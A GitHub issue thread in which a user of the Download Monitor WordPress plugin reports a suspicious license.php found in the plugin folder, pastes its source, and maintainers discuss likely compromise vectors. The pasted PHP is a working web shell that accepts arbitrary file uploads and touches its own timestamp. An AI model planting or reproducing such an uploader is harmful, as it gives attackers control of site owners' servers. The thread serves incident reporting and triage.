### ISSUE TITLE
Vulnerability? (malicious wp-content/plugins/download-monitor/license.php)

### ISSUE THREAD

**Issue by xeagle2** [download-monitor/download-monitor#319]
Download monitor: 1.8.0
WordPress: 4.2.4

Recently discovered new file at download-monitor installation folder with the code below. Does the plugin have vulnerability?

```
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>ZdP2dJBzAWtV</title>
</head>
<body>
<?php
print '<h1>#p@$c@#</h1>';
echo "Your IP: "; /*_*/
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";

if (@is_uploaded_file( $_FILES["filename"]["tmp_name"] ))
{
        /*_*/
        move_uploaded_file($_FILES["filename"]["tmp_name"],     $_FILES["filename"]["name"]);

        $file = $_FILES["filename"]["name"];
        echo "<a href=\"$file\">$file</a>";

}
else
{
        /*_*/
        echo("empty");
        /*_*/
}

$var1 = $_SERVER['SCRIPT_FILENAME'];

touch( $var1 );
?>
</body>
</html>
```

**Comment by BarryCarlyon** [comment]
It's more likely your webhost is compromised, or another plugin, and the malicious script just chose Download Monitor to dump it's file in. Or a user broke into WP-Admin and uploaded from there

**Comment by xeagle2** [comment]
The file has been created by user who is the owner of a certain www scripts running on the server. No other unauthorized access has been detected to wp-admin, and download monitor is only one capable to upload the files plugin installed on WP. I'm not sure if it's download monitor or anything else, just the file has been discovered at download monitor folder.

**Comment by barrykooij** [comment]
We haven't received any reports of any vulnerabilities of Download Monitor 1.8 +. Like @BarryCarlyon states, this is can be a vulnerability at so many levels that simply uploads to the dlm directory because it happens to have enough permission to write in. Download Monitor uses the default WordPress upload functionality so that can't be the problem (or is a problem on all WordPress websites).

I'm closing this for now. If you do find a vulnerability in Download Monitor please contact me directly via https://www.download-monitor.com/contact/

Good luck with this unfortunate situation.
